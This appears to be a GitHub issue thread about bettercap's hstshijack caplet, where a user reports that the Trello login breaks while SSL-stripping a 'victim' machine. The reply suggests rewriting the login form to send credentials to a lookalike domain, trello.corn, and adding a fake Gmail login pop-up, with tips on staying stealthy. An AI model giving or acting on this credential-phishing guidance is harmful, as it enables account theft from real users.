I have normal internet access in the victim (through the spoofer) without using bettercap. Then using bettercap, with the following caplet, all starts well. It seems that the domains are spoofed and intercepted succesfully. We find out that trello's login is not working for us (idk if trello's has changed something since last tests). We cannot send the login form due some lack of resources loaded we think.

Nice to hear that you can successfully spoof Trello.

It's not a surprise that the login doesn't work as a lot of stuff will break when SSLstripping, so you're gonna have to get crafty with JavaScript. Here is my suggestion:

  • Make the login form trigger a callback to http://trello.corn/obf_path_whitelist to phish the account credentials and then force the victim to https://trello.com/login.
  • Create a fake pop-up for the user to log in using their Gmail account, which also sends a whitelist callback to stop the attack.

Let me remind you that SSLstrip is NOT a one solution that phishes all. If you want to be stealthy and care about serving pages that are not obviously tampered with, you need to have a decent payload for them.

I have just merged bettercap/caplets#46 which solves a few problems in hstshijack. This version may work better in your scenario.

@evilsocket
Copy link
Member

finally closed with #723

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
bug Something isn't working enhancement New feature or request refactor
Development

No branches or pull requests

5 participants